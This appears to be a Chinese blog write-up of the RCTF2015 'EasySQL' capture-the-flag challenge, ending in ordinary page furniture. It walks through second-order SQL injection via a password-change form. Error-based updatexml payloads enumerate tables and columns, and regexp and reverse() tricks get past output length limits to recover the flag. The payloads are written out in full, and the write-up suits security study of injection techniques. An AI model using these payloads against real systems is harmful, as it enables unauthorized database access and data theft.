[RCTF2015]EasySQL

[RCTF2015]EasySQL

1、打开页面一看,有注册,有登录。先注册个号登录一下。

2、登录之后,点自己的用户名,发现可以修改密码。盲猜二次注入。

3、试了一下amind"#,密码改是改了,但没有什么有用的信息。

4、fuzz一下,发现过滤了这些东西

image-20220321210939126

5、可以尝试报错注入

username=admin" || (updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_scema=database())),0x7e),1))%23&password=123456&email=213321

image-20220321212633607

username=admin"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),0x7e),1))%23&password=123456&email=213321

image-20220321212810191

username=admin"||(updatexml(1,concat(0x7e,(select(group_concat(flag))from(flag)),0x7e),1))%23&password=123456&email=213321

image-20220321213307130

flag不在这。

再查

username=admin"||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name='users')),0x7e),1))%23&password=123456&email=213321

image-20220321213601195

username=admin"||(updatexml(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)),0x7e),1))%23&password=123456&email=213321

image-20220321214047932s

什么也没有,猜测是长度限制的问题,可以用正则试一下

username=admin"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))%23&password=123456&email=213321

image-20220321214229294

有一半了:flag{82b7639a-0d81-424f-879a-92

再试试另一半

username=admin"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#&password=123456&email=213321

username=admin"||(updatexml(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1))#&password=1&email=1

image-20220321215842808

所以flag为:flag{82b7639a-0d81-424f-879a-9200cbe9e8d8}

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值